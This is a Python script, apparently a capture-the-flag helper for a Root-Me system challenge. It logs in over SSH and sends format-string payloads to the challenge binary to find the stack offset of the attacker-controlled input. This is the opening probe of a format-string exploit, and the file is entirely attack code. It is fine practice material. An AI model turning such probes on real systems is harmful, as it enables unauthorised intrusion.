#!/usr/bin/env python3
import base64
import re
import shlex

import paramiko


HOST = "challenge02.root-me.org"
PORT = 2222
USER = "app-systeme-ch14"
PASSWORD = "app-systeme-ch14"
BIN = "/challenge/app-systeme/ch14/ch14"


def run_payload(ssh: paramiko.SSHClient, payload: bytes, pty: bool = False) -> str:
    b64 = base64.b64encode(payload).decode()
    py = f"import os,base64;p=base64.b64decode('{b64}');os.execv('{BIN}',[b'ch14',p])"
    cmd = "python3 -c " + shlex.quote(py)
    _, stdout, _ = ssh.exec_command(cmd, get_pty=pty)
    return stdout.read().decode("latin-1", "ignore")


def main() -> None:
    ssh = paramiko.SSHClient()
    ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    ssh.connect(HOST, port=PORT, username=USER, password=PASSWORD, timeout=10)

    try:
        found = None
        for i in range(1, 80):
            payload = f"AAAA.%{i}$x".encode()
            out = run_payload(ssh, payload)
            m = re.search(r"fmt=\[(.*)\]", out)
            if not m:
                continue
            fmt_out = m.group(1).lower()
            if "41414141" in fmt_out:
                found = i
                print(f"[+] offset found: {i}")
                print(f"[+] fmt output: {m.group(1)}")
                break

        if found is None:
            print("[-] offset not found in tested range")
    finally:
        ssh.close()


if __name__ == "__main__":
    main()